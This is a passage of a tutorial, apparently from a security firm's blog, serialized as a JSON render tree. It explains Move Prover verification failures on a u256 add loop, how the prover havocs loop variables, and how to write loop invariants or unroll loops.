}\n",{"type":28,"tag":116,"props":10246,"children":10247},{"class":245,"line":631},[10248],{"type":28,"tag":116,"props":10249,"children":10250},{"style":282},[10251],{"type":33,"value":10252},"╰─────^\n",{"type":28,"tag":116,"props":10254,"children":10255},{"class":245,"line":665},[10256],{"type":28,"tag":116,"props":10257,"children":10258},{"emptyLinePlaceholder":19},[10259],{"type":33,"value":1044},{"type":28,"tag":116,"props":10261,"children":10262},{"class":245,"line":713},[10263],{"type":28,"tag":116,"props":10264,"children":10265},{"style":266},[10266],{"type":33,"value":9986},{"type":28,"tag":116,"props":10268,"children":10269},{"class":245,"line":750},[10270],{"type":28,"tag":116,"props":10271,"children":10272},{"emptyLinePlaceholder":19},[10273],{"type":33,"value":1044},{"type":28,"tag":116,"props":10275,"children":10276},{"class":245,"line":779},[10277,10282,10287],{"type":28,"tag":116,"props":10278,"children":10279},{"style":282},[10280],{"type":33,"value":10281}," at",{"type":28,"tag":116,"props":10283,"children":10284},{"style":563},[10285],{"type":33,"value":10286}," ./sources/u256.move:316:",{"type":28,"tag":116,"props":10288,"children":10289},{"style":563},[10290],{"type":33,"value":10291}," add\n",{"type":28,"tag":116,"props":10293,"children":10294},{"class":245,"line":796},[10295,10300,10305,10310,10314,10319,10323,10328,10333,10338,10343,10348],{"type":28,"tag":116,"props":10296,"children":10297},{"style":282},[10298],{"type":33,"value":10299}," enter",{"type":28,"tag":116,"props":10301,"children":10302},{"style":563},[10303],{"type":33,"value":10304}," loop,",{"type":28,"tag":116,"props":10306,"children":10307},{"style":563},[10308],{"type":33,"value":10309}," variable",{"type":28,"tag":116,"props":10311,"children":10312},{"style":266},[10313],{"type":33,"value":313},{"type":28,"tag":116,"props":10315,"children":10316},{"style":282},[10317],{"type":33,"value":10318},"s",{"type":28,"tag":116,"props":10320,"children":10321},{"style":266},[10322],{"type":33,"value":1609},{"type":28,"tag":116,"props":10324,"children":10325},{"style":563},[10326],{"type":33,"value":10327},"carry,",{"type":28,"tag":116,"props":10329,"children":10330},{"style":563},[10331],{"type":33,"value":10332}," i,",{"type":28,"tag":116,"props":10334,"children":10335},{"style":563},[10336],{"type":33,"value":10337}," ret",{"type":28,"tag":116,"props":10339,"children":10340},{"style":563},[10341],{"type":33,"value":10342}," havocked",{"type":28,"tag":116,"props":10344,"children":10345},{"style":563},[10346],{"type":33,"value":10347}," and",{"type":28,"tag":116,"props":10349,"children":10350},{"style":563},[10351],{"type":33,"value":10352}," reassigned\n",{"type":28,"tag":116,"props":10354,"children":10355},{"class":245,"line":847},[10356,10361,10365],{"type":28,"tag":116,"props":10357,"children":10358},{"style":282},[10359],{"type":33,"value":10360},"     carry",{"type":28,"tag":116,"props":10362,"children":10363},{"style":563},[10364],{"type":33,"value":2226},{"type":28,"tag":116,"props":10366,"children":10367},{"style":350},[10368],{"type":33,"value":10369}," 54\n",{"type":28,"tag":116,"props":10371,"children":10372},{"class":245,"line":898},[10373,10378,10382],{"type":28,"tag":116,"props":10374,"children":10375},{"style":282},[10376],{"type":33,"value":10377},"     i",{"type":28,"tag":116,"props":10379,"children":10380},{"style":563},[10381],{"type":33,"value":2226},{"type":28,"tag":116,"props":10383,"children":10384},{"style":350},[10385],{"type":33,"value":10386}," 3792\n",{"type":28,"tag":116,"props":10388,"children":10389},{"class":245,"line":907},[10390,10395,10399,10404,10408,10413,10418,10422,10427,10432,10436,10441,10446,10450,10455],{"type":28,"tag":116,"props":10391,"children":10392},{"style":282},[10393],{"type":33,"value":10394},"     ret",{"type":28,"tag":116,"props":10396,"children":10397},{"style":563},[10398],{"type":33,"value":2226},{"type":28,"tag":116,"props":10400,"children":10401},{"style":563},[10402],{"type":33,"value":10403}," u256.U256{v0",{"type":28,"tag":116,"props":10405,"children":10406},{"style":563},[10407],{"type":33,"value":2226},{"type":28,"tag":116,"props":10409,"children":10410},{"style":563},[10411],{"type":33,"value":10412}," 26418,",{"type":28,"tag":116,"props":10414,"children":10415},{"style":563},[10416],{"type":33,"value":10417}," v1",{"type":28,"tag":116,"props":10419,"children":10420},{"style":563},[10421],{"type":33,"value":2226},{"type":28,"tag":116,"props":10423,"children":10424},{"style":563},[10425],{"type":33,"value":10426}," 27938,",{"type":28,"tag":116,"props":10428,"children":10429},{"style":563},[10430],{"type":33,"value":10431}," v2",{"type":28,"tag":116,"props":10433,"children":10434},{"style":563},[10435],{"type":33,"value":2226},{"type":28,"tag":116,"props":10437,"children":10438},{"style":563},[10439],{"type":33,"value":10440}," 6900,",{"type":28,"tag":116,"props":10442,"children":10443},{"style":563},[10444],{"type":33,"value":10445}," v3",{"type":28,"tag":116,"props":10447,"children":10448},{"style":563},[10449],{"type":33,"value":2226},{"type":28,"tag":116,"props":10451,"children":10452},{"style":350},[10453],{"type":33,"value":10454}," 1999",{"type":28,"tag":116,"props":10456,"children":10457},{"style":563},[10458],{"type":33,"value":406},{"type":28,"tag":116,"props":10460,"children":10461},{"class":245,"line":981},[10462,10466,10471],{"type":28,"tag":116,"props":10463,"children":10464},{"style":282},[10465],{"type":33,"value":10281},{"type":28,"tag":116,"props":10467,"children":10468},{"style":563},[10469],{"type":33,"value":10470}," ./sources/u256.move:346:",{"type":28,"tag":116,"props":10472,"children":10473},{"style":563},[10474],{"type":33,"value":10291},{"type":28,"tag":116,"props":10476,"children":10477},{"class":245,"line":1011},[10478],{"type":28,"tag":116,"props":10479,"children":10480},{"style":282},[10481],{"type":33,"value":10482},"     ABORTED\n",{"type":28,"tag":116,"props":10484,"children":10485},{"class":245,"line":1029},[10486],{"type":28,"tag":116,"props":10487,"children":10488},{"emptyLinePlaceholder":19},[10489],{"type":33,"value":1044},{"type":28,"tag":116,"props":10491,"children":10492},{"class":245,"line":1038},[10493,10498,10503,10507,10512,10517,10522,10526,10531,10535],{"type":28,"tag":116,"props":10494,"children":10495},{"style":282},[10496],{"type":33,"value":10497},"FAILURE",{"type":28,"tag":116,"props":10499,"children":10500},{"style":563},[10501],{"type":33,"value":10502}," proving",{"type":28,"tag":116,"props":10504,"children":10505},{"style":350},[10506],{"type":33,"value":4192},{"type":28,"tag":116,"props":10508,"children":10509},{"style":563},[10510],{"type":33,"value":10511}," modules",{"type":28,"tag":116,"props":10513,"children":10514},{"style":563},[10515],{"type":33,"value":10516}," from",{"type":28,"tag":116,"props":10518,"children":10519},{"style":563},[10520],{"type":33,"value":10521}," package",{"type":28,"tag":116,"props":10523,"children":10524},{"style":563},[10525],{"type":33,"value":10041},{"type":28,"tag":116,"props":10527,"children":10528},{"style":282},[10529],{"type":33,"value":10530},"u256",{"type":28,"tag":116,"props":10532,"children":10533},{"style":563},[10534],{"type":33,"value":890},{"type":28,"tag":116,"props":10536,"children":10537},{"style":266},[10538],{"type":33,"value":10539}," in 9.143s\n",{"type":28,"tag":116,"props":10541,"children":10542},{"class":245,"line":1047},[10543],{"type":28,"tag":116,"props":10544,"children":10545},{"style":266},[10546],{"type":33,"value":10547},"{\n",{"type":28,"tag":116,"props":10549,"children":10550},{"class":245,"line":1071},[10551,10556,10560],{"type":28,"tag":116,"props":10552,"children":10553},{"style":282},[10554],{"type":33,"value":10555},"    \"Error\"",{"type":28,"tag":116,"props":10557,"children":10558},{"style":282},[10559],{"type":33,"value":4160},{"type":28,"tag":116,"props":10561,"children":10562},{"style":563},[10563],{"type":33,"value":10564}," \"Move Prover failed: exiting with verification errors\"\n",{"type":28,"tag":116,"props":10566,"children":10567},{"class":245,"line":1137},[10568],{"type":28,"tag":116,"props":10569,"children":10570},{"style":266},[10571],{"type":33,"value":406},{"type":28,"tag":29,"props":10573,"children":10574},{},[10575,10577,10582],{"type":33,"value":10576},"The prover is telling us that proving failed because the abort was not covered by our ",{"type":28,"tag":98,"props":10578,"children":10580},{"className":10579},[],[10581],{"type":33,"value":7997},{"type":33,"value":10583}," clauses. But there is no other abort situation that we have to cover, right?",{"type":28,"tag":29,"props":10585,"children":10586},{},[10587,10589,10595],{"type":33,"value":10588},"If we keep reading the error output, we will encounter the somewhat cryptic message: ",{"type":28,"tag":98,"props":10590,"children":10592},{"className":10591},[],[10593],{"type":33,"value":10594},"ret havocked and reassigned",{"type":33,"value":141},{"type":28,"tag":29,"props":10597,"children":10598},{},[10599],{"type":33,"value":10600},"What does this mean?",{"type":28,"tag":29,"props":10602,"children":10603},{},[10604,10606,10613],{"type":33,"value":10605},"By diving into the Move Prover source, we find a ",{"type":28,"tag":87,"props":10607,"children":10610},{"href":10608,"rel":10609},"https://github.com/move-language/move/blob/e0dafc5cf3efe4c4e61411f10cdf0f379a36673c/language/move-prover/bytecode/src/loop_analysis.rs#L94",[91],[10611],{"type":33,"value":10612},"likely suspect",{"type":33,"value":10614},". The prover attempts to prove all loops with induction!",{"type":28,"tag":29,"props":10616,"children":10617},{},[10618],{"type":33,"value":10619},"More formally, it will translate the loop into two key steps, following the classic steps of a proof by induction",{"type":28,"tag":455,"props":10621,"children":10622},{},[10623,10628],{"type":28,"tag":459,"props":10624,"children":10625},{},[10626],{"type":33,"value":10627},"Base Case: Asserting the loop invariant holds at the start of loop execution",{"type":28,"tag":459,"props":10629,"children":10630},{},[10631],{"type":33,"value":10632},"Inductive Step: Assume the invariant, execute the loop body, and assert that the invariant still holds",{"type":28,"tag":29,"props":10634,"children":10635},{},[10636,10638,10643,10645,10651,10652,10658,10660,10665,10667,10672],{"type":33,"value":10637},"The loop prover will also ",{"type":28,"tag":4995,"props":10639,"children":10640},{},[10641],{"type":33,"value":10642},"havoc, or assign random values to, all variables written to inside the loop",{"type":33,"value":10644},". Going back to the log message, this implies that the variables ",{"type":28,"tag":98,"props":10646,"children":10648},{"className":10647},[],[10649],{"type":33,"value":10650},"carry",{"type":33,"value":825},{"type":28,"tag":98,"props":10653,"children":10655},{"className":10654},[],[10656],{"type":33,"value":10657},"ret",{"type":33,"value":10659}," and ",{"type":28,"tag":98,"props":10661,"children":10663},{"className":10662},[],[10664],{"type":33,"value":3408},{"type":33,"value":10666}," have been havocked, or assigned random values. This also explains why the input and output of ",{"type":28,"tag":98,"props":10668,"children":10670},{"className":10669},[],[10671],{"type":33,"value":9306},{"type":33,"value":10673}," makes no sense.",{"type":28,"tag":29,"props":10675,"children":10676},{},[10677],{"type":33,"value":10678},"More concretely, the loop analysis translates into the following steps.",{"type":28,"tag":455,"props":10680,"children":10681},{},[10682,10687,10692,10697,10702,10707],{"type":28,"tag":459,"props":10683,"children":10684},{},[10685],{"type":33,"value":10686},"Assert the loop invariant",{"type":28,"tag":459,"props":10688,"children":10689},{},[10690],{"type":33,"value":10691},"Havoc all modified variables",{"type":28,"tag":459,"props":10693,"children":10694},{},[10695],{"type":33,"value":10696},"Assume the loop invariant",{"type":28,"tag":459,"props":10698,"children":10699},{},[10700],{"type":33,"value":10701},"Assume the loop guard (the code inside the while condition)",{"type":28,"tag":459,"props":10703,"children":10704},{},[10705],{"type":33,"value":10706},"Run the loop body",{"type":28,"tag":459,"props":10708,"children":10709},{},[10710],{"type":33,"value":10686},{"type":28,"tag":29,"props":10712,"children":10713},{},[10714],{"type":33,"value":10715},"There are two approaches to dealing with loops.",{"type":28,"tag":29,"props":10717,"children":10718},{},[10719],{"type":33,"value":10720},"The first would be to specify a loop invariant.",{"type":28,"tag":29,"props":10722,"children":10723},{},[10724,10726,10733],{"type":33,"value":10725},"In order to specify the loop invariant, we need to use some special syntax, as we explored briefly in our ",{"type":28,"tag":87,"props":10727,"children":10730},{"href":10728,"rel":10729},"https://osec.io/blog/tutorials/2022-09-06-move-introduction/",[91],[10731],{"type":33,"value":10732},"previous post",{"type":33,"value":141},{"type":28,"tag":234,"props":10735,"children":10737},{"code":10736,"language":2651,"meta":7,"className":2652,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) {\n      vector::push_back(\n          &mut amounts_times_coins,\n          (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n      );\n      i = i + 1;\n  };\n",[10738],{"type":28,"tag":98,"props":10739,"children":10740},{"__ignoreMap":7},[10741,10753,10764,10800,10823,10906,10913,10937,10945,10965,10985,11076,11083,11111],{"type":28,"tag":116,"props":10742,"children":10743},{"class":245,"line":246},[10744,10749],{"type":28,"tag":116,"props":10745,"children":10746},{"style":260},[10747],{"type":33,"value":10748},"  while",{"type":28,"tag":116,"props":10750,"children":10751},{"style":266},[10752],{"type":33,"value":8205},{"type":28,"tag":116,"props":10754,"children":10755},{"class":245,"line":256},[10756,10760],{"type":28,"tag":116,"props":10757,"children":10758},{"style":272},[10759],{"type":33,"value":8599},{"type":28,"tag":116,"props":10761,"children":10762},{"style":266},[10763],{"type":33,"value":1291},{"type":28,"tag":116,"props":10765,"children":10766},{"class":245,"line":293},[10767,10772,10776,10780,10784,10788,10792,10796],{"type":28,"tag":116,"props":10768,"children":10769},{"style":272},[10770],{"type":33,"value":10771},"          invariant",{"type":28,"tag":116,"props":10773,"children":10774},{"style":282},[10775],{"type":33,"value":8230},{"type":28,"tag":116,"props":10777,"children":10778},{"style":266},[10779],{"type":33,"value":313},{"type":28,"tag":116,"props":10781,"children":10782},{"style":272},[10783],{"type":33,"value":8239},{"type":28,"tag":116,"props":10785,"children":10786},{"style":266},[10787],{"type":33,"value":1609},{"type":28,"tag":116,"props":10789,"children":10790},{"style":370},[10791],{"type":33,"value":2340},{"type":28,"tag":116,"props":10793,"children":10794},{"style":272},[10795],{"type":33,"value":3068},{"type":28,"tag":116,"props":10797,"children":10798},{"style":266},[10799],{"type":33,"value":384},{"type":28,"tag":116,"props":10801,"children":10802},{"class":245,"line":361},[10803,10807,10811,10815,10819],{"type":28,"tag":116,"props":10804,"children":10805},{"style":272},[10806],{"type":33,"value":10771},{"type":28,"tag":116,"props":10808,"children":10809},{"style":272},[10810],{"type":33,"value":3068},{"type":28,"tag":116,"props":10812,"children":10813},{"style":370},[10814],{"type":33,"value":7869},{"type":28,"tag":116,"props":10816,"children":10817},{"style":272},[10818],{"type":33,"value":8159},{"type":28,"tag":116,"props":10820,"children":10821},{"style":266},[10822],{"type":33,"value":384},{"type":28,"tag":116,"props":10824,"children":10825},{"class":245,"line":387},[10826,10830,10834,10838,10842,10846,10850,10854,10858,10862,10866,10870,10874,10878,10882,10886,10890,10894,10898,10902],{"type":28,"tag":116,"props":10827,"children":10828},{"style":272},[10829],{"type":33,"value":10771},{"type":28,"tag":116,"props":10831,"children":10832},{"style":272},[10833],{"type":33,"value":8290},{"type":28,"tag":116,"props":10835,"children":10836},{"style":272},[10837],{"type":33,"value":8295},{"type":28,"tag":116,"props":10839,"children":10840},{"style":376},[10841],{"type":33,"value":2713},{"type":28,"tag":116,"props":10843,"children":10844},{"style":350},[10845],{"type":33,"value":2718},{"type":28,"tag":116,"props":10847,"children":10848},{"style":370},[10849],{"type":33,"value":2723},{"type":28,"tag":116,"props":10851,"children":10852},{"style":272},[10853],{"type":33,"value":3408},{"type":28,"tag":116,"props":10855,"children":10856},{"style":370},[10857],{"type":33,"value":4160},{"type":28,"tag":116,"props":10859,"children":10860},{"style":272},[10861],{"type":33,"value":8094},{"type":28,"tag":116,"props":10863,"children":10864},{"style":266},[10865],{"type":33,"value":347},{"type":28,"tag":116,"props":10867,"children":10868},{"style":272},[10869],{"type":33,"value":8328},{"type":28,"tag":116,"props":10871,"children":10872},{"style":266},[10873],{"type":33,"value":8333},{"type":28,"tag":116,"props":10875,"children":10876},{"style":370},[10877],{"type":33,"value":2340},{"type":28,"tag":116,"props":10879,"children":10880},{"style":272},[10881],{"type":33,"value":8342},{"type":28,"tag":116,"props":10883,"children":10884},{"style":266},[10885],{"type":33,"value":347},{"type":28,"tag":116,"props":10887,"children":10888},{"style":272},[10889],{"type":33,"value":8328},{"type":28,"tag":116,"props":10891,"children":10892},{"style":266},[10893],{"type":33,"value":8333},{"type":28,"tag":116,"props":10895,"children":10896},{"style":370},[10897],{"type":33,"value":4240},{"type":28,"tag":116,"props":10899,"children":10900},{"style":272},[10901],{"type":33,"value":8159},{"type":28,"tag":116,"props":10903,"children":10904},{"style":266},[10905],{"type":33,"value":384},{"type":28,"tag":116,"props":10907,"children":10908},{"class":245,"line":400},[10909],{"type":28,"tag":116,"props":10910,"children":10911},{"style":266},[10912],{"type":33,"value":8591},{"type":28,"tag":116,"props":10914,"children":10915},{"class":245,"line":614},[10916,10921,10925,10929,10933],{"type":28,"tag":116,"props":10917,"children":10918},{"style":266},[10919],{"type":33,"value":10920},"      (",{"type":28,"tag":116,"props":10922,"children":10923},{"style":272},[10924],{"type":33,"value":3408},{"type":28,"tag":116,"props":10926,"children":10927},{"style":370},[10928],{"type":33,"value":8391},{"type":28,"tag":116,"props":10930,"children":10931},{"style":272},[10932],{"type":33,"value":8159},{"type":28,"tag":116,"props":10934,"children":10935},{"style":266},[10936],{"type":33,"value":2830},{"type":28,"tag":116,"props":10938,"children":10939},{"class":245,"line":631},[10940],{"type":28,"tag":116,"props":10941,"children":10942},{"style":266},[10943],{"type":33,"value":10944},"  }) {\n",{"type":28,"tag":116,"props":10946,"children":10947},{"class":245,"line":665},[10948,10953,10957,10961],{"type":28,"tag":116,"props":10949,"children":10950},{"style":266},[10951],{"type":33,"value":10952},"      vector",{"type":28,"tag":116,"props":10954,"children":10955},{"style":370},[10956],{"type":33,"value":3151},{"type":28,"tag":116,"props":10958,"children":10959},{"style":282},[10960],{"type":33,"value":8424},{"type":28,"tag":116,"props":10962,"children":10963},{"style":266},[10964],{"type":33,"value":3133},{"type":28,"tag":116,"props":10966,"children":10967},{"class":245,"line":713},[10968,10973,10977,10981],{"type":28,"tag":116,"props":10969,"children":10970},{"style":370},[10971],{"type":33,"value":10972},"          &",{"type":28,"tag":116,"props":10974,"children":10975},{"style":376},[10976],{"type":33,"value":3394},{"type":28,"tag":116,"props":10978,"children":10979},{"style":272},[10980],{"type":33,"value":8094},{"type":28,"tag":116,"props":10982,"children":10983},{"style":266},[10984],{"type":33,"value":3178},{"type":28,"tag":116,"props":10986,"children":10987},{"class":245,"line":750},[10988,10992,10996,11000,11004,11008,11012,11016,11020,11024,11028,11032,11036,11040,11044,11048,11052,11056,11060,11064,11068,11072],{"type":28,"tag":116,"props":10989,"children":10990},{"style":266},[10991],{"type":33,"value":8382},{"type":28,"tag":116,"props":10993,"children":10994},{"style":370},[10995],{"type":33,"value":4240},{"type":28,"tag":116,"props":10997,"children":10998},{"style":266},[10999],{"type":33,"value":8465},{"type":28,"tag":116,"props":11001,"children":11002},{"style":370},[11003],{"type":33,"value":3151},{"type":28,"tag":116,"props":11005,"children":11006},{"style":282},[11007],{"type":33,"value":8474},{"type":28,"tag":116,"props":11009,"children":11010},{"style":266},[11011],{"type":33,"value":313},{"type":28,"tag":116,"props":11013,"children":11014},{"style":370},[11015],{"type":33,"value":2780},{"type":28,"tag":116,"props":11017,"children":11018},{"style":272},[11019],{"type":33,"value":8039},{"type":28,"tag":116,"props":11021,"children":11022},{"style":266},[11023],{"type":33,"value":8491},{"type":28,"tag":116,"props":11025,"children":11026},{"style":272},[11027],{"type":33,"value":3408},{"type":28,"tag":116,"props":11029,"children":11030},{"style":376},[11031],{"type":33,"value":8500},{"type":28,"tag":116,"props":11033,"children":11034},{"style":339},[11035],{"type":33,"value":5531},{"type":28,"tag":116,"props":11037,"children":11038},{"style":266},[11039],{"type":33,"value":2390},{"type":28,"tag":116,"props":11041,"children":11042},{"style":376},[11043],{"type":33,"value":8513},{"type":28,"tag":116,"props":11045,"children":11046},{"style":339},[11047],{"type":33,"value":8518},{"type":28,"tag":116,"props":11049,"children":11050},{"style":266},[11051],{"type":33,"value":1609},{"type":28,"tag":116,"props":11053,"children":11054},{"style":370},[11055],{"type":33,"value":4240},{"type":28,"tag":116,"props":11057,"children":11058},{"style":266},[11059],{"type":33,"value":269},{"type":28,"tag":116,"props":11061,"children":11062},{"style":272},[11063],{"type":33,"value":8535},{"type":28,"tag":116,"props":11065,"children":11066},{"style":376},[11067],{"type":33,"value":8500},{"type":28,"tag":116,"props":11069,"children":11070},{"style":339},[11071],{"type":33,"value":8518},{"type":28,"tag":116,"props":11073,"children":11074},{"style":266},[11075],{"type":33,"value":2830},{"type":28,"tag":116,"props":11077,"children":11078},{"class":245,"line":779},[11079],{"type":28,"tag":116,"props":11080,"children":11081},{"style":266},[11082],{"type":33,"value":6438},{"type":28,"tag":116,"props":11084,"children":11085},{"class":245,"line":796},[11086,11091,11095,11099,11103,11107],{"type":28,"tag":116,"props":11087,"children":11088},{"style":272},[11089],{"type":33,"value":11090},"      i",{"type":28,"tag":116,"props":11092,"children":11093},{"style":370},[11094],{"type":33,"value":2226},{"type":28,"tag":116,"props":11096,"children":11097},{"style":272},[11098],{"type":33,"value":3068},{"type":28,"tag":116,"props":11100,"children":11101},{"style":370},[11102],{"type":33,"value":2258},{"type":28,"tag":116,"props":11104,"children":11105},{"style":350},[11106],{"type":33,"value":4192},{"type":28,"tag":116,"props":11108,"children":11109},{"style":266},[11110],{"type":33,"value":384},{"type":28,"tag":116,"props":11112,"children":11113},{"class":245,"line":847},[11114],{"type":28,"tag":116,"props":11115,"children":11116},{"style":266},[11117],{"type":33,"value":11118},"  };\n",{"type":28,"tag":29,"props":11120,"children":11121},{},[11122,11124,11130,11132,11137,11139,11145],{"type":33,"value":11123},"In this case, the brackets specify the loop invariant for the ",{"type":28,"tag":98,"props":11125,"children":11127},{"className":11126},[],[11128],{"type":33,"value":11129},"while",{"type":33,"value":11131}," loop. Note that because the loop invariant executes ",{"type":28,"tag":2583,"props":11133,"children":11134},{},[11135],{"type":33,"value":11136},"after",{"type":33,"value":11138}," the loop guard, so we need to account for an extra step with ",{"type":28,"tag":98,"props":11140,"children":11142},{"className":11141},[],[11143],{"type":33,"value":11144},"i \u003C= n_coins",{"type":33,"value":141},{"type":28,"tag":234,"props":11147,"children":11149},{"code":11148,"language":2651,"meta":7,"className":2652,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) {\n",[11150],{"type":28,"tag":98,"props":11151,"children":11152},{"__ignoreMap":7},[11153,11164,11175,11210,11233,11316,11323,11346],{"type":28,"tag":116,"props":11154,"children":11155},{"class":245,"line":246},[11156,11160],{"type":28,"tag":116,"props":11157,"children":11158},{"style":260},[11159],{"type":33,"value":10748},{"type":28,"tag":116,"props":11161,"children":11162},{"style":266},[11163],{"type":33,"value":8205},{"type":28,"tag":116,"props":11165,"children":11166},{"class":245,"line":256},[11167,11171],{"type":28,"tag":116,"props":11168,"children":11169},{"style":272},[11170],{"type":33,"value":8599},{"type":28,"tag":116,"props":11172,"children":11173},{"style":266},[11174],{"type":33,"value":1291},{"type":28,"tag":116,"props":11176,"children":11177},{"class":245,"line":293},[11178,11182,11186,11190,11194,11198,11202,11206],{"type":28,"tag":116,"props":11179,"children":11180},{"style":272},[11181],{"type":33,"value":10771},{"type":28,"tag":116,"props":11183,"children":11184},{"style":282},[11185],{"type":33,"value":8230},{"type":28,"tag":116,"props":11187,"children":11188},{"style":266},[11189],{"type":33,"value":313},{"type":28,"tag":116,"props":11191,"children":11192},{"style":272},[11193],{"type":33,"value":8239},{"type":28,"tag":116,"props":11195,"children":11196},{"style":266},[11197],{"type":33,"value":1609},{"type":28,"tag":116,"props":11199,"children":11200},{"style":370},[11201],{"type":33,"value":2340},{"type":28,"tag":116,"props":11203,"children":11204},{"style":272},[11205],{"type":33,"value":3068},{"type":28,"tag":116,"props":11207,"children":11208},{"style":266},[11209],{"type":33,"value":384},{"type":28,"tag":116,"props":11211,"children":11212},{"class":245,"line":361},[11213,11217,11221,11225,11229],{"type":28,"tag":116,"props":11214,"children":11215},{"style":272},[11216],{"type":33,"value":10771},{"type":28,"tag":116,"props":11218,"children":11219},{"style":272},[11220],{"type":33,"value":3068},{"type":28,"tag":116,"props":11222,"children":11223},{"style":370},[11224],{"type":33,"value":7869},{"type":28,"tag":116,"props":11226,"children":11227},{"style":272},[11228],{"type":33,"value":8159},{"type":28,"tag":116,"props":11230,"children":11231},{"style":266},[11232],{"type":33,"value":384},{"type":28,"tag":116,"props":11234,"children":11235},{"class":245,"line":387},[11236,11240,11244,11248,11252,11256,11260,11264,11268,11272,11276,11280,11284,11288,11292,11296,11300,11304,11308,11312],{"type":28,"tag":116,"props":11237,"children":11238},{"style":272},[11239],{"type":33,"value":10771},{"type":28,"tag":116,"props":11241,"children":11242},{"style":272},[11243],{"type":33,"value":8290},{"type":28,"tag":116,"props":11245,"children":11246},{"style":272},[11247],{"type":33,"value":8295},{"type":28,"tag":116,"props":11249,"children":11250},{"style":376},[11251],{"type":33,"value":2713},{"type":28,"tag":116,"props":11253,"children":11254},{"style":350},[11255],{"type":33,"value":2718},{"type":28,"tag":116,"props":11257,"children":11258},{"style":370},[11259],{"type":33,"value":2723},{"type":28,"tag":116,"props":11261,"children":11262},{"style":272},[11263],{"type":33,"value":3408},{"type":28,"tag":116,"props":11265,"children":11266},{"style":370},[11267],{"type":33,"value":4160},{"type":28,"tag":116,"props":11269,"children":11270},{"style":272},[11271],{"type":33,"value":8094},{"type":28,"tag":116,"props":11273,"children":11274},{"style":266},[11275],{"type":33,"value":347},{"type":28,"tag":116,"props":11277,"children":11278},{"style":272},[11279],{"type":33,"value":8328},{"type":28,"tag":116,"props":11281,"children":11282},{"style":266},[11283],{"type":33,"value":8333},{"type":28,"tag":116,"props":11285,"children":11286},{"style":370},[11287],{"type":33,"value":2340},{"type":28,"tag":116,"props":11289,"children":11290},{"style":272},[11291],{"type":33,"value":8342},{"type":28,"tag":116,"props":11293,"children":11294},{"style":266},[11295],{"type":33,"value":347},{"type":28,"tag":116,"props":11297,"children":11298},{"style":272},[11299],{"type":33,"value":8328},{"type":28,"tag":116,"props":11301,"children":11302},{"style":266},[11303],{"type":33,"value":8333},{"type":28,"tag":116,"props":11305,"children":11306},{"style":370},[11307],{"type":33,"value":4240},{"type":28,"tag":116,"props":11309,"children":11310},{"style":272},[11311],{"type":33,"value":8159},{"type":28,"tag":116,"props":11313,"children":11314},{"style":266},[11315],{"type":33,"value":384},{"type":28,"tag":116,"props":11317,"children":11318},{"class":245,"line":400},[11319],{"type":28,"tag":116,"props":11320,"children":11321},{"style":266},[11322],{"type":33,"value":8591},{"type":28,"tag":116,"props":11324,"children":11325},{"class":245,"line":614},[11326,11330,11334,11338,11342],{"type":28,"tag":116,"props":11327,"children":11328},{"style":266},[11329],{"type":33,"value":10920},{"type":28,"tag":116,"props":11331,"children":11332},{"style":272},[11333],{"type":33,"value":3408},{"type":28,"tag":116,"props":11335,"children":11336},{"style":370},[11337],{"type":33,"value":8391},{"type":28,"tag":116,"props":11339,"children":11340},{"style":272},[11341],{"type":33,"value":8159},{"type":28,"tag":116,"props":11343,"children":11344},{"style":266},[11345],{"type":33,"value":2830},{"type":28,"tag":116,"props":11347,"children":11348},{"class":245,"line":631},[11349],{"type":28,"tag":116,"props":11350,"children":11351},{"style":266},[11352],{"type":33,"value":10944},{"type":28,"tag":29,"props":11354,"children":11355},{},[11356],{"type":33,"value":11357},"Loop invariants are often difficult to write, especially for nontrivial loop bodies.",{"type":28,"tag":29,"props":11359,"children":11360},{},[11361,11363,11368],{"type":33,"value":11362},"The second solution to dealing with loops is to unroll the loop. This technique works in this particular situation because, as we can observe, the loop within the ",{"type":28,"tag":98,"props":11364,"children":11366},{"className":11365},[],[11367],{"type":33,"value":9306},{"type":33,"value":11369}," function will always iterate exactly 4 times:",{"type":28,"tag":234,"props":11371,"children":11373},{"code":11372,"language":2651,"meta":7,"className":2652,"style":7},"/// Total words in `U256` (64 * 4 = 256).\nconst WORDS: u64 = 4;\n\n[...]\n\nlet i = 0;\nwhile (i \u003C WORDS) {\n    let a1 = get(&a, i);\n    let b1 = get(&b, i);\n\n[...]\n",[11374],{"type":28,"tag":98,"props":11375,"children":11376},{"__ignoreMap":7},[11377,11385,11418,11425,11441,11448,11472,11496,11541,11585,11592],{"type":28,"tag":116,"props":11378,"children":11379},{"class":245,"line":246},[11380],{"type":28,"tag":116,"props":11381,"children":11382},{"style":250},[11383],{"type":33,"value":11384},"/// Total words in `U256` (64 * 4 = 256).\n",{"type":28,"tag":116,"props":11386,"children":11387},{"class":245,"line":256},[11388,11392,11397,11401,11405,11409,11414],{"type":28,"tag":116,"props":11389,"children":11390},{"style":376},[11391],{"type":33,"value":9323},{"type":28,"tag":116,"props":11393,"children":11394},{"style":266},[11395],{"type":33,"value":11396}," WORDS",{"type":28,"tag":116,"props":11398,"children":11399},{"style":370},[11400],{"type":33,"value":4160},{"type":28,"tag":116,"props":11402,"children":11403},{"style":339},[11404],{"type":33,"value":5531},{"type":28,"tag":116,"props":11406,"children":11407},{"style":370},[11408],{"type":33,"value":2226},{"type":28,"tag":116,"props":11410,"children":11411},{"style":350},[11412],{"type":33,"value":11413}," 